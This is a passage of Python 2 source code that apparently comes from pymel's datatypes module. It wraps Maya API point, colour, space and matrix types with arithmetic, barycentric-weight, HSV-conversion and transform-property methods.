= p \"\"\"\n if not isinstance(p, Point):\n try:\n p = Point(p)\n except:\n raise TypeError, \"%s is not convertible to type Point, bWeights is only defined for n MPoints\" % (util.clsname(p))\n return p.bWeights(*args)\n\n\nclass Point(Vector):\n\n \"\"\" A 4 dimensional vector class that wraps Maya's api Point class,\n \"\"\"\n apicls = _api.MPoint\n cnames = ('x', 'y', 'z', 'w')\n shape = (4,)\n\n def __melobject__(self):\n \"\"\"Special method for returning a mel-friendly representation. In this case, a cartesian 3D point \"\"\"\n return self.cartesian()\n\n# # base methods are inherited from Vector\n\n # we only show the x, y, z components on an iter\n def __len__(self):\n l = len(self.data)\n if self.w == 1.0:\n l -= 1\n return l\n\n def __iter__(self, *args, **kwargs):\n \"\"\" Iterate on the api components \"\"\"\n l = len(self)\n for c in list(self.apicls.__iter__(self.data))[:l]:\n yield c\n\n # modified operators, when adding 2 Point consider second as Vector\n def __add__(self, other):\n \"\"\" u.__add__(v) <==> u+v\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n # prb with coerce when delegating to VectorN, either redefine coerce for Point or other fix\n # if isinstance(other, Point) :\n # other = Vector(other)\n try:\n other = Vector(other)\n except:\n pass\n try:\n return self.__class__._convert(self.apicls.__add__(self, other))\n except:\n return self.__class__._convert(super(Vector, self).__add__(other))\n\n def __radd__(self, other):\n \"\"\" u.__radd__(v) <==> v+u\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n if isinstance(other, Point):\n other = Vector(other)\n try:\n return self.__class__._convert(self.apicls.__radd__(self, other))\n except:\n return self.__class__._convert(super(Point, self).__radd__(other))\n\n def __iadd__(self, other):\n \"\"\" u.__iadd__(v) <==> u += v\n In place addition of u and v, see __add__ \"\"\"\n try:\n return self.__class__(self.__add__(other))\n except:\n return NotImplemented\n\n # specific api methods\n def cartesianize(self):\n \"\"\" p.cartesianize() --> Point\n If the point instance p is of the form P(W*x, W*y, W*z, W), for some scale factor W != 0,\n then it is reset to be P(x, y, z, 1).\n This will only work correctly if the point is in homogenous form or cartesian form.\n If the point is in rational form, the results are not defined. \"\"\"\n return self.__class__(self.apicls.cartesianize(self))\n\n def cartesian(self):\n \"\"\" p.cartesian() --> Point\n Returns the cartesianized version of p, without changing p. \"\"\"\n t = copy.deepcopy(self)\n self.apicls.cartesianize(t)\n return t\n\n def rationalize(self):\n \"\"\" p.rationalize() --> Point\n If the point instance p is of the form P(W*x, W*y, W*z, W) (ie. is in homogenous or (for W==1) cartesian form),\n for some scale factor W != 0, then it is reset to be P(x, y, z, W).\n This will only work correctly if the point is in homogenous or cartesian form.\n If the point is already in rational form, the results are not defined. \"\"\"\n return self.__class__(self.apicls.rationalize(self))\n\n def rational(self):\n \"\"\" p.rational() --> Point\n Returns the rationalized version of p, without changing p. 
\"\"\"\n t = copy.deepcopy(self)\n self.apicls.rationalize(t)\n return t\n\n def homogenize(self):\n \"\"\" p.homogenize() --> Point\n If the point instance p is of the form P(x, y, z, W) (ie. is in rational or (for W==1) cartesian form),\n for some scale factor W != 0, then it is reset to be P(W*x, W*y, W*z, W). \"\"\"\n return self.__class__(self.apicls.homogenize(self))\n\n def homogen(self):\n \"\"\" p.homogen() --> Point\n Returns the homogenized version of p, without changing p. \"\"\"\n t = copy.deepcopy(self)\n self.apicls.homogenize(t)\n return t\n\n # additionnal methods\n\n def isEquivalent(self, other, tol=None):\n \"\"\" Returns true if both arguments considered as Point are equal within the specified tolerance \"\"\"\n if tol is None:\n tol = _api.MPoint_kTol\n try:\n nself, nother = coerce(self, other)\n except:\n return False\n if isinstance(nself, Point):\n return bool(nself.apicls.isEquivalent(nself, nother, tol))\n else:\n return bool(super(Point, nself).isEquivalent(nother, tol))\n\n def axis(self, start, end, normalize=False):\n \"\"\" a.axis(b, c) --> Vector\n Returns the axis of rotation from point b to c around a as the vector n = (b-a)^(c-a)\n if the normalize keyword argument is set to True, n is also normalized \"\"\"\n return Vector.axis(start - self, end - self, normalize=normalize)\n\n def angle(self, start, end):\n \"\"\" a.angle(b, c) --> float\n Returns the angle (in radians) of rotation from point b to c around a.\n Note that this angle is not signed, use axis to know the direction of the rotation \"\"\"\n return Vector.angle(start - self, end - self)\n\n def cotan(self, start, end):\n \"\"\" a.cotan(b, c) --> float :\n cotangent of the (b-a), (c-a) angle, a, b, and c should be MPoints representing points a, b, c\"\"\"\n return VectorN.cotan(start - self, end - self)\n\n def planar(self, *args, **kwargs):\n \"\"\" p.planar(q, r, s (...), tol=tolerance) --> bool\n Returns True if all provided points are planar within given tolerance \"\"\"\n if len(args) > 2:\n tol = kwargs.get('tol', None)\n n = (args[0] - self) ^ (args[1] - self)\n return reduce(operator.and_, map(lambda x: n.isParallel(x, tol), [(args[0] - self) ^ (a - self) for a in args[2:]]), True)\n else:\n return True\n\n def center(self, *args):\n \"\"\" p.center(q, r, s (...)) --> Point\n Returns the Point that is the center of p, q, r, s (...) \"\"\"\n return sum((self,) + args) / float(len(args) + 1)\n\n def bWeights(self, *args):\n \"\"\" p.bWeights(p0, p1, (...), pn) --> tuple\n Returns a tuple of (n0, n1, ...) normalized barycentric weights so that n0*p0 + n1*p1 + ... 
= p.\n This method works for n points defining a concave or convex n sided face,\n always returns positive normalized weights, and is continuous on the face limits (on the edges),\n but the n points must be coplanar, and p must be inside the face delimited by (p0, ..., pn) \"\"\"\n if args:\n p = self\n q = list(args)\n np = len(q)\n w = VectorN(0.0, size=np)\n weightSum = 0.0\n pOnEdge = False\n tol = _api.MPoint_kTol\n # all args should be MPoints\n for i in xrange(np):\n if not isinstance(q[i], Point):\n try:\n q[i] = Point(q[i])\n except:\n raise TypeError, \"cannot convert %s to Point, bWeights is defined for n MPoints\" % (util.clsname(q[i]))\n # if p sits on an edge, it' a limit case and there is an easy solution,\n # all weights are 0 but for the 2 edge end points\n for i in xrange(np):\n next = (i + 1) % np\n\n e = ((q[next] - q[i]) ^ (p - q[i])).sqlength()\n l = (q[next] - q[i]).sqlength()\n if e <= (tol * l):\n if l < tol:\n # p is on a 0 length edge, point and next point are on top of each other, as is p then\n w[i] = 0.5\n w[next] = 0.5\n else:\n # p is somewhere on that edge between point and next point\n di = (p - q[i]).length()\n w[next] = float(di / sqrt(l))\n w[i] = 1.0 - w[next]\n # in both case update the weights sum and mark p as being on an edge,\n # problem is solved\n weightSum += 1.0\n pOnEdge = True\n break\n # If p not on edge, use the cotangents method\n if not pOnEdge:\n for i in xrange(np):\n prev = (i + np - 1) % np\n next = (i + 1) % np\n\n lenSq = (p - q[i]).sqlength()\n w[i] = (q[i].cotan(p, q[prev]) + q[i].cotan(p, q[next])) / lenSq\n weightSum += w[i]\n\n # then normalize result\n if abs(weightSum):\n w /= weightSum\n else:\n raise ValueError, \"failed to compute bWeights for %s and %s.\\nThe point bWeights are computed for must be inside the planar face delimited by the n argument points\" % (self, args)\n\n return tuple(w)\n else:\n return ()\n\n\nclass FloatPoint(Point):\n\n \"\"\" A 4 dimensional vector class that wraps Maya's api FloatPoint class,\n It behaves identically to Point, but it also derives from api's FloatPoint\n to keep api methods happy\n \"\"\"\n apicls = _api.MFloatPoint\n\n\nclass Color(Vector):\n\n \"\"\" A 4 dimensional vector class that wraps Maya's api Color class,\n It stores the r, g, b, a components of the color, as normalized (Python) floats\n \"\"\"\n apicls = _api.MColor\n cnames = ('r', 'g', 'b', 'a')\n shape = (4,)\n # modes = ('rgb', 'hsv', 'cmy', 'cmyk')\n modes = ('rgb', 'hsv')\n\n # constants\n red = _api.MColor(1.0, 0.0, 0.0)\n green = _api.MColor(0.0, 1.0, 0.0)\n blue = _api.MColor(0.0, 0.0, 1.0)\n white = _api.MColor(1.0, 1.0, 1.0)\n black = _api.MColor(0.0, 0.0, 0.0)\n opaque = _api.MColor(0.0, 0.0, 0.0, 1.0)\n clear = _api.MColor(0.0, 0.0, 0.0, 0.0)\n\n # static methods\n @staticmethod\n def rgbtohsv(c):\n c = tuple(c)\n return tuple(colorsys.rgb_to_hsv(*clamp(c[:3])) + c[3:4])\n\n @staticmethod\n def hsvtorgb(c):\n c = tuple(c)\n # return colorsys.hsv_to_rgb(clamp(c[0]), clamp(c[1]), clamp(c[2]))\n return tuple(colorsys.hsv_to_rgb(*clamp(c[:3])) + c[3:4])\n\n # TODO : could define rgb and hsv iterators and allow __setitem__ and __getitem__ on these iterators\n # like (it's more simple) it's done in ArrayIter\n def _getrgba(self):\n return tuple(self)\n\n def _setrgba(self, value):\n if not hasattr(value, '__iter__'):\n # the way api interprets a single value\n # value = (None, None, None, value)\n value = (value,) * 4\n l = list(self)\n for i, v in enumerate(value[:4]):\n if v is not None:\n l[i] = float(v)\n 
self.assign(*l)\n rgba = property(_getrgba, _setrgba, None, \"The r,g,b,a Color components\"\"\")\n\n def _getrgb(self):\n return self.rgba[:3]\n\n def _setrgb(self, value):\n if not hasattr(value, '__iter__'):\n value = (value,) * 3\n self.rgba = value[:3]\n rgb = property(_getrgb, _setrgb, None, \"The r,g,b Color components\"\"\")\n\n def _gethsva(self):\n return tuple(Color.rgbtohsv(self))\n\n def _sethsva(self, value):\n if not hasattr(value, '__iter__'):\n # the way api interprets a single value\n # value = (None, None, None, value)\n value = (value,) * 4\n l = list(Color.rgbtohsv(self))\n for i, v in enumerate(value[:4]):\n if v is not None:\n l[i] = float(v)\n self.assign(*Color.hsvtorgb(self))\n hsva = property(_gethsva, _sethsva, None, \"The h,s,v,a Color components\"\"\")\n\n def _gethsv(self):\n return tuple(Color.rgbtohsv(self))[:3]\n\n def _sethsv(self, value):\n if not hasattr(value, '__iter__'):\n value = (value,) * 3\n self.hsva = value[:3]\n hsv = property(_gethsv, _sethsv, None, \"The h,s,v,a Color components\"\"\")\n\n def _geth(self):\n return self.hsva[0]\n\n def _seth(self, value):\n self.hsva = (value, None, None, None)\n h = property(_geth, _seth, None, \"The h Color component\"\"\")\n\n def _gets(self):\n return self.hsva[1]\n\n def _sets(self, value):\n self.hsva = (None, value, None, None)\n s = property(_gets, _sets, None, \"The s Color component\"\"\")\n\n def _getv(self):\n return self.hsva[2]\n\n def _setv(self, value):\n self.hsva = (None, None, value, None)\n v = property(_getv, _setv, None, \"The v Color component\"\"\")\n\n # __new__ is herited from Point/Vector, need to override __init__ to accept hsv mode though\n\n def __init__(self, *args, **kwargs):\n \"\"\" Init a Color instance\n Can pass one argument being another Color instance , or the color components \"\"\"\n cls = self.__class__\n mode = kwargs.get('mode', None)\n if mode is not None and mode not in cls.modes:\n raise ValueError, \"unknown mode %s for %s\" % (mode, util.clsname(self))\n # can also use the form =\n # for now supports only rgb and hsv flags\n hsvflag = {}\n rgbflag = {}\n for a in 'hsv':\n if a in kwargs:\n hsvflag[a] = kwargs[a]\n for a in 'rgb':\n if a in kwargs:\n rgbflag[a] = kwargs[a]\n # can't mix them\n if hsvflag and rgbflag:\n raise ValueError, \"can not mix r,g,b and h,s,v keyword arguments in a %s declaration\" % util.clsname(self)\n # if no mode specified, guess from what keyword arguments where used, else use 'rgb' as default\n if mode is None:\n if hsvflag:\n mode = 'hsv'\n else:\n mode = 'rgb'\n # can't specify a mode and use keywords of other modes\n if mode is not 'hsv' and hsvflag:\n raise ValueError, \"Can not use h,s,v keyword arguments while specifying %s mode in %s\" % (mode, util.clsname(self))\n elif mode is not 'rgb' and rgbflag:\n raise ValueError, \"Can not use r,g,b keyword arguments while specifying %s mode in %s\" % (mode, util.clsname(self))\n # NOTE: do not try to use mode with _api.Color, it seems bugged as of 2008\n #import colorsys\n #colorsys.rgb_to_hsv(0.0, 0.0, 1.0)\n ## Result: (0.66666666666666663, 1.0, 1.0) #\n #c = _api.Color(_api.Color.kHSV, 0.66666666666666663, 1.0, 1.0)\n # print \"# Result: \",c[0], c[1], c[2], c[3],\" #\"\n ## Result: 1.0 0.666666686535 1.0 1.0 #\n #c = _api.Color(_api.Color.kHSV, 0.66666666666666663*360, 1.0, 1.0)\n # print \"# Result: \",c[0], c[1], c[2], c[3],\" #\"\n ## Result: 1.0 240.0 1.0 1.0 #\n #colorsys.hsv_to_rgb(0.66666666666666663, 1.0, 1.0)\n ## Result: (0.0, 0.0, 1.0) #\n # we'll use Color only to 
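        # A minimal illustrative sketch of the pymel-level construction handled below (hypothetical values,\n        # assumes a Maya session, not recorded output):\n        #c = Color(1.0, 0.5, 0.0)                  # r, g, b components, alpha defaults to 1.0\n        #c = Color(0.6, 1.0, 1.0, mode='hsv')      # the same positional components read as h, s, v\n        #c = Color(255, 128, 0, quantize=255.0)    # integer components divided down to 0.0-1.0 floats\n        #c.rgb, c.hsva, c.h                        # read the component properties defined above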
store RGB values internally and do the conversion a read/write if desired\n # which I think make more sense anyway\n # quantize (255, 65535, no quantize means colors are 0.0-1.0 float values)\n # Initializing api's Color with int values seems also not to always behave so we quantize first and\n # use a float init always\n quantize = kwargs.get('quantize', None)\n if quantize is not None:\n try:\n quantize = float(quantize)\n except:\n raise ValueError, \"quantize must be a numeric value, not %s\" % (util.clsname(quantize))\n # can be initilized with a single argument (other Color, Vector, VectorN)\n if len(args) == 1:\n args = args[0]\n # we dont rely much on Color api as it doesn't seem totally finished, and do some things directly here\n if isinstance(args, self.__class__) or isinstance(args, self.apicls):\n # alternatively could be just ignored / output as warning\n if quantize:\n raise ValueError, \"Can not quantize a Color argument, a Color is always stored internally as float color\" % (mode, util.clsname(self))\n if mode == 'rgb':\n args = VectorN(args)\n elif mode == 'hsv':\n args = VectorN(cls.rgbtohsv(args))\n else:\n # single alpha value, as understood by api will break coerce behavior in operations\n # where other operand is a scalar\n # if not hasattr(args, '__iter__') :\n # args = VectorN(0.0, 0.0, 0.0, args)\n if hasattr(args, '__len__'):\n shape = (min(len(args), cls.size),)\n else:\n shape = cls.shape\n args = VectorN(args, shape=shape)\n # quantize if needed\n if quantize:\n args /= quantize\n # pad to a full Color size\n args.stack(self[len(args):])\n\n # apply keywords arguments, and convert if mode is not rgb\n if mode == 'rgb':\n if rgbflag:\n for i, a in enumerate('rgb'):\n if a in rgbflag:\n if quantize:\n args[i] = float(rgbflag[a]) / quantize\n else:\n args[i] = float(rgbflag[a])\n elif mode == 'hsv':\n if hsvflag:\n for i, a in enumerate('hsv'):\n if a in hsvflag:\n if quantize:\n args[i] = float(hsvflag[a]) / quantize\n else:\n args[i] = float(hsvflag[a])\n args = VectorN(cls.hsvtorgb(args))\n # finally alpha keyword\n a = kwargs.get('a', None)\n if a is not None:\n if quantize:\n args[-1] = float(a) / quantize\n else:\n args[-1] = float(a)\n\n try:\n self.assign(args)\n except:\n msg = \", \".join(map(lambda x, y: x + \"=<\" + util.clsname(y) + \">\", mode, args))\n raise TypeError, \"in %s(%s), at least one of the components is of an invalid type, check help(%s) \" % (util.clsname(self), msg, util.clsname(self))\n\n def __melobject__(self):\n \"\"\"Special method for returning a mel-friendly representation. 
In this case, a 3-component color (RGB) \"\"\"\n return [self.r, self.g, self.b]\n\n # overriden operators\n\n # defined for two MColors only\n def __add__(self, other):\n \"\"\" c.__add__(d) <==> c+d\n Returns the result of the addition of MColors c and d if d is convertible to a Color,\n adds d to every component of c if d is a scalar \"\"\"\n # prb with coerce when delegating to VectorN, either redefine coerce for Point or other fix\n # if isinstance(other, Point) :\n # other = Vector(other)\n try:\n other = Color(other)\n except:\n pass\n try:\n return self.__class__._convert(self.apicls.__add__(self, other))\n except:\n return self.__class__._convert(super(Vector, self).__add__(other))\n\n def __radd__(self, other):\n \"\"\" c.__radd__(d) <==> d+c\n Returns the result of the addition of MColors c and d if d is convertible to a Color,\n adds d to every component of c if d is a scalar \"\"\"\n try:\n other = Color(other)\n except:\n pass\n try:\n return self.__class__._convert(self.apicls.__radd__(self, other))\n except:\n return self.__class__._convert(super(Point, self).__radd__(other))\n\n def __iadd__(self, other):\n \"\"\" c.__iadd__(d) <==> c += d\n In place addition of c and d, see __add__ \"\"\"\n try:\n return self.__class__(self.__add__(other))\n except:\n return NotImplemented\n\n def __sub__(self, other):\n \"\"\" c.__add__(d) <==> c+d\n Returns the result of the substraction of Color d from c if d is convertible to a Color,\n substract d from every component of c if d is a scalar \"\"\"\n try:\n other = Color(other)\n except:\n pass\n try:\n return self.__class__._convert(self.apicls.__sub__(self, other))\n except:\n return self.__class__._convert(super(Vector, self).__sub__(other))\n\n def __rsub__(self, other):\n \"\"\" c.__rsub__(d) <==> d-c\n Returns the result of the substraction of Color c from d if d is convertible to a Color,\n replace every component c[i] of c by d-c[i] if d is a scalar \"\"\"\n try:\n other = Color(other)\n except:\n pass\n try:\n return self.__class__._convert(self.apicls.__rsub__(self, other))\n except:\n return self.__class__._convert(super(Point, self).__rsub__(other))\n\n def __isub__(self, other):\n \"\"\" c.__isub__(d) <==> c -= d\n In place substraction of d from c, see __sub__ \"\"\"\n try:\n return self.__class__(self.__sub__(other))\n except:\n return NotImplemented\n # action depends on second object type\n # TODO : would be nice to define LUT classes and allow MColor * LUT transform\n # overloaded operators\n\n def __mul__(self, other):\n \"\"\" a.__mul__(b) <==> a*b\n If b is a 1D sequence (Array, VectorN, Color), __mul__ is mapped to element-wise multiplication,\n If b is a MatrixN, __mul__ is similar to Point a by MatrixN b multiplication (post multiplication or transformation of a by b),\n multiplies every component of a by b if b is a single numeric value \"\"\"\n if isinstance(other, MatrixN):\n # will defer to MatrixN rmul\n return NotImplemented\n else:\n # will defer to Array.__mul__\n return Array.__mul__(self, other)\n\n def __rmul__(self, other):\n \"\"\" a.__rmul__(b) <==> b*a\n If b is a 1D sequence (Array, VectorN, Color), __mul__ is mapped to element-wise multiplication,\n If b is a MatrixN, __mul__ is similar to MatrixN b by Point a matrix multiplication,\n multiplies every component of a by b if b is a single numeric value \"\"\"\n if isinstance(other, MatrixN):\n # will defer to MatrixN mul\n return NotImplemented\n else:\n # will defer to Array.__rmul__\n return Array.__rmul__(self, other)\n\n def __imul__(self, 
other):\n \"\"\" a.__imul__(b) <==> a *= b\n In place multiplication of VectorN a and b, see __mul__, result must fit a's type \"\"\"\n res = self * other\n if isinstance(res, self.__class__):\n return self.__class__(res)\n else:\n raise TypeError, \"result of in place multiplication of %s by %s is not a %s\" % (clsname(self), clsname(other), clsname(self))\n\n # additionnal methods, to be extended\n def over(self, other):\n \"\"\" c1.over(c2): Composites c1 over other c2 using c1's alpha, the resulting color has the alpha of c2 \"\"\"\n if isinstance(other, Color):\n a = self.a\n return Color(Vector(other).blend(Vector(self), self.a), a=other.a)\n else:\n raise TypeError, \"over is defined for Color instances, not %s\" % (util.clsname(other))\n # return Vector instead ? Keeping alpha doesn't make much sense\n\n def premult(self):\n \"\"\" Premultiply Color r, g and b by it's alpha and resets alpha to 1.0 \"\"\"\n return self.__class__(Vector(self) * self.a)\n\n def gamma(self, g):\n \"\"\" c.gamma(g) applies gamma correction g to Color c, g can be a scalar and then will be applied to r, g, b\n or an iterable of up to 3 (r, g, b) independant gamma correction values \"\"\"\n if not hasattr(g, '__iter__'):\n g = (g,) * 3 + (1.0,)\n else:\n g = g[:3] + (1.0,) * (4 - len(g[:3]))\n return gamma(self, g)\n\n def hsvblend(self, other, weight=0.5):\n \"\"\" c1.hsvblend(c2) --> Color\n Returns the result of blending c1 with c2 in hsv space, using the given weight \"\"\"\n c1 = list(self.hsva)\n c2 = list(other.hsva)\n if abs(c2[0] - c1[0]) >= 0.5:\n if abs(c2[0] - c1[0]) == 0.5:\n c1[1], c2[1] = 0.0, 0.0\n if c1[0] > 0.5:\n c1[0] -= 1.0\n if c2[0] > 0.5:\n c2[0] -= 1.0\n c = blend(c1, c2, weight=weight)\n if c[0] < 0.0:\n c[0] += 1.0\n return self.__class__(c, mode='hsv')\n\n\n# to specify space of transforms\n\nclass Space(_api.MSpace):\n apicls = _api.MSpace\n __metaclass__ = _factories.MetaMayaTypeWrapper\n pass\n\nSpaces = Space.Space\n\ndef equivalentSpace(space1, space2, rotationOnly=False):\n '''Compare the two given space values to see if they are equal\n\n Parameters\n ----------\n space1 : int or str\n the first space to compare (may be either the integer enum value, or the\n api enum name - ie, \"kPostTransform\" - or the pymel enum name - ie,\n \"postTransform\" )\n space2 : int or str\n the seoncd space to compare (may be either the integer enum value, or\n the api enum name - ie, \"kPostTransform\" - or the pymel enum name - ie,\n \"postTransform\")\n rotationOnly : bool\n If true, then compare the spaces, assuming we are only considering\n rotation - in rotation, transform is the same as preTransform/object\n (the reason being that in maya, preTransform means rotation +\n translation are both defined in the preTransform/object coordinate\n system, while transform means rotation is defined in preTransform/object\n coordinates, while translate is given in the postTransform space...\n which matches the way maya applies transforms)\n '''\n translated = []\n for space in space1, space2:\n space = _factories.ApiArgUtil.castInputEnum('MSpace', 'Space', space)\n if rotationOnly:\n # for the purposes of rotations, maya treats transform and\n # preTransform/object as the same (the reason being that in maya,\n # preTransform means both rotation + translation are both defined in\n # the preTransform/object coordinate system, while transform means\n # rotation is defined in preTransform/object coordinates, while\n # translate is given in the postTransform space... 
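            # Illustrative calls (hypothetical, assumes a Maya session; per the docstring both enum ints and\n            # names are accepted and cast through ApiArgUtil.castInputEnum):\n            #   equivalentSpace(_api.MSpace.kObject, 'preTransform')\n            #   equivalentSpace('kTransform', 'object', rotationOnly=True)   # kTransform folds into kPreTransform here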
which matches the\n # way maya applies transforms)\n if space == _api.MSpace.kTransform:\n space = _api.MSpace.kPreTransform\n translated.append(space)\n\n\n# kInvalid\n# kTransform\n# Transform matrix (relative) space\n# kPreTransform\n# Pre-transform matrix (geometry)\n# kPostTransform\n# Post-transform matrix (world) space\n# kWorld\n# transform in world space\n# kObject\n# Same as pre-transform space\n# kLast\n\n# sadly TransformationMatrix.RotationOrder and EulerRotation.RotationOrder don't match\n\n# class MRotationOrder(int):\n# pass\n\n# kInvalid\n# kXYZ\n# kYZX\n# kZXY\n# kXZY\n# kYXZ\n# kZYX\n# kLast\n\n\n# kXYZ\n# kYZX\n# kZXY\n# kXZY\n# kYXZ\n# kZYX\n\n# functions that work on MatrixN (det(), inv(), ...) herited from arrays\n# and properly defer to the class methods\n\n# For row, column order, see the definition of a TransformationMatrix in docs :\n# T = | 1 0 0 0 |\n# | 0 1 0 0 |\n# | 0 0 1 0 |\n# | tx ty tz 1 |\n# and m(r, c) should return value of cell at r row and c column :\n# t = _api.TransformationMatrix()\n# t.setTranslation(_api.Vector(1, 2, 3), _api.MSpace.kWorld)\n# m = t.asMatrix()\n# mm(3,0)\n# 1.0\n# mm(3,1)\n# 2.0\n# mm(3,2)\n# 3.0\n\nclass Matrix(MatrixN):\n\n \"\"\"\n A 4x4 transformation matrix based on api Matrix\n\n >>> from pymel.all import *\n >>> import pymel.core.datatypes as dt\n >>>\n >>> i = dt.Matrix()\n >>> print i.formated()\n [[1.0, 0.0, 0.0, 0.0],\n [0.0, 1.0, 0.0, 0.0],\n [0.0, 0.0, 1.0, 0.0],\n [0.0, 0.0, 0.0, 1.0]]\n\n >>> v = dt.Matrix(1, 2, 3)\n >>> print v.formated()\n [[1.0, 2.0, 3.0, 0.0],\n [1.0, 2.0, 3.0, 0.0],\n [1.0, 2.0, 3.0, 0.0],\n [1.0, 2.0, 3.0, 0.0]]\n\n\n \"\"\"\n __metaclass__ = MetaMayaArrayTypeWrapper\n apicls = _api.MMatrix\n shape = (4, 4)\n cnames = ('a00', 'a01', 'a02', 'a03',\n 'a10', 'a11', 'a12', 'a13',\n 'a20', 'a21', 'a22', 'a23',\n 'a30', 'a31', 'a32', 'a33')\n\n # constants\n\n identity = _api.MMatrix()\n\n def __new__(cls, *args, **kwargs):\n shape = kwargs.get('shape', None)\n ndim = kwargs.get('ndim', None)\n size = kwargs.get('size', None)\n # will default to class constant shape = (4, 4), so it's just an error check to catch invalid shapes,\n # as no other option is actually possible on Matrix, but this method could be used to allow wrapping\n # of Maya array classes that can have a variable number of elements\n shape, ndim, size = cls._expandshape(shape, ndim, size)\n\n new = cls.apicls.__new__(cls)\n cls.apicls.__init__(new)\n return new\n\n def __init__(self, *args, **kwargs):\n \"\"\" __init__ method, valid for Vector, Point and Color classes \"\"\"\n cls = self.__class__\n\n if args:\n # allow both forms for arguments\n if len(args) == 1 and hasattr(args[0], '__iter__'):\n args = args[0]\n# shape = kwargs.get('shape', None)\n# ndim = kwargs.get('ndim', None)\n# size = kwargs.get('size', None)\n# if shape is not None or ndim is not None or size is not None :\n# shape, ndim, size = cls._expandshape(shape, ndim, size)\n# args = MatrixN(args, shape=shape, ndim=ndim, size=size)\n # shortcut when a direct api init is possible\n try:\n self.assign(args)\n except:\n super(MatrixN, self).__init__(*args)\n # value = list(Matrix(value, shape=self.shape).flat)\n # data = self.apicls()\n # _api.MScriptUtil.createMatrixFromList ( value, data )\n\n if hasattr(cls, 'cnames') and len(set(cls.cnames) & set(kwargs)):\n # can also use the form =\n l = list(self.flat)\n setcomp = False\n for i, c in enumerate(cls.cnames):\n if c in kwargs:\n if float(l[i]) != float(kwargs[c]):\n l[i] = float(kwargs[c])\n setcomp = True\n if 
setcomp:\n try:\n self.assign(l)\n except:\n msg = \", \".join(map(lambda x, y: x + \"=<\" + util.clsname(y) + \">\", cls.cnames, l))\n raise TypeError, \"in %s(%s), at least one of the components is of an invalid type, check help(%s) \" % (cls.__name__, msg, cls.__name__)\n\n # for compatibility with base classes Array that actually hold a nested list in their _data attribute\n # here, there is no _data attribute as we subclass _api.Vector directly, thus v.data is v\n # for wraps\n\n def _getdata(self):\n return self\n\n def _setdata(self, value):\n self.assign(value)\n\n def _deldata(self):\n if hasattr(self.apicls, 'clear'):\n self.apicls.clear(self)\n else:\n raise TypeError, \"cannot clear stored elements of %s\" % (self.__class__.__name__)\n\n data = property(_getdata, _setdata, _deldata, \"The Matrix/FloatMatrix/TransformationMatrix/Quaternion/EulerRotation data\")\n\n # set properties for easy acces to translation / rotation / scale of a Matrix or derived class\n # some of these will only yield dependable results if Matrix is a TransformationMatrix and some\n # will always be zero for some classes (ie only rotation has a value on a Quaternion\n\n def _getTranslate(self):\n t = TransformationMatrix(self)\n return Vector(t.getTranslation(_api.MSpace.kTransform))\n\n def _setTranslate(self, value):\n t = TransformationMatrix(self)\n t.setTranslation(Vector(value), _api.MSpace.kTransform)\n self.assign(t.asMatrix())\n translate = property(_getTranslate, _setTranslate, None, \"The translation expressed in this Matrix, in transform space\")\n\n def _getRotate(self):\n t = TransformationMatrix(self)\n return Quaternion(t.apicls.rotation(t))\n\n def _setRotate(self, value):\n t = TransformationMatrix(self)\n q = Quaternion(value)\n t.rotateTo(q)\n # values = (q.x, q.y, q.z, q.w)\n # t.setRotationQuaternion(q.x, q.y, q.z, q.w)\n self.assign(t.asMatrix())\n rotate = property(_getRotate, _setRotate, None, \"The rotation expressed in this Matrix, in transform space\")\n\n def _getScale(self):\n t = TransformationMatrix(self)\n return Vector(t.getScale(_api.MSpace.kTransform))\n\n def _setScale(self, value):\n t = TransformationMatrix(self)\n t.setScale(value, _api.MSpace.kTransform)\n self.assign(t.asMatrix())\n scale = property(_getScale, _setScale, None, \"The scale expressed in this Matrix, in transform space\")\n\n def __melobject__(self):\n \"\"\"Special method for returning a mel-friendly representation. 
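        # Hypothetical property usage (assumes a Maya session; values illustrative, not recorded output):\n        #   m = Matrix()\n        #   m.translate = (1, 2, 3)   # routed through a temporary TransformationMatrix, see _setTranslate above\n        #   m.translate               # read back as Vector(1.0, 2.0, 3.0), in transform space\n        #   m.rotate                  # rotation component as a Quaternion\n        #   m.scale                   # scale component as a Vector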
In this case, a flat list of 16 values \"\"\"\n return [x for x in self.flat]\n\n # some Matrix derived classes can actually be represented as matrix but not stored\n # internally as such by the API\n\n def asMatrix(self, percent=None):\n \"The matrix representation for this Matrix/TransformationMatrix/Quaternion/EulerRotation instance\"\n if percent is not None and percent != 1.0:\n if type(self) is not TransformationMatrix:\n self = TransformationMatrix(self)\n return Matrix(self.apicls.asMatrix(self, percent))\n else:\n if type(self) is Matrix:\n return self\n else:\n return Matrix(self.apicls.asMatrix(self))\n\n matrix = property(asMatrix, None, None, \"The Matrix representation for this Matrix/TransformationMatrix/Quaternion/EulerRotation instance\")\n\n # overloads for assign and get though standard way should be to use the data property\n # to access stored values\n def assign(self, value):\n # don't accept instances as assign works on exact _api.Matrix type\n data = None\n if type(value) == self.apicls or type(value) == type(self):\n data = value\n elif hasattr(value, 'asMatrix'):\n data = value.asMatrix()\n else:\n value = list(MatrixN(value).flat)\n if len(value) == self.size:\n data = self.apicls()\n if isinstance(data, _api.MFloatMatrix):\n _api.MScriptUtil.createFloatMatrixFromList(value, data)\n elif isinstance(data, _api.MMatrix):\n _api.MScriptUtil.createMatrixFromList(value, data)\n else:\n tmp = _api.MMatrix()\n _api.MScriptUtil.createMatrixFromList(value, tmp)\n data = self.apicls(tmp)\n else:\n raise TypeError, \"cannot assign %s to a %s\" % (value, util.clsname(self))\n\n self.apicls.assign(self, data)\n return self\n\n # API get, actually not faster than pulling self[i] for such a short structure\n def get(self):\n \"\"\" Wrap the Matrix api get method \"\"\"\n mat = self.matrix\n return tuple(tuple(_api.MScriptUtil.getDoubleArrayItem(_api.MMatrix.__getitem__(mat, r), c) for c in xrange(Matrix.shape[1])) for r in xrange(Matrix.shape[0]))\n # ptr = _api.Matrix(self.matrix).matrix\n # return tuple(tuple(_api.MScriptUtil.getDouble2ArrayItem ( ptr, r, c) for c in xrange(Matrix.shape[1])) for r in xrange(Matrix.shape[0]))\n\n def __len__(self):\n \"\"\" Number of components in the Matrix instance \"\"\"\n return self.apicls.__len__(self)\n\n # iterator override\n # TODO : support for optionnal __iter__ arguments\n def __iter__(self, *args, **kwargs):\n \"\"\" Iterate on the Matrix rows \"\"\"\n return self.apicls.__iter__(self.data)\n # contains is herited from Array contains\n\n # __getitem__ / __setitem__ override\n def __getitem__(self, index):\n \"\"\" 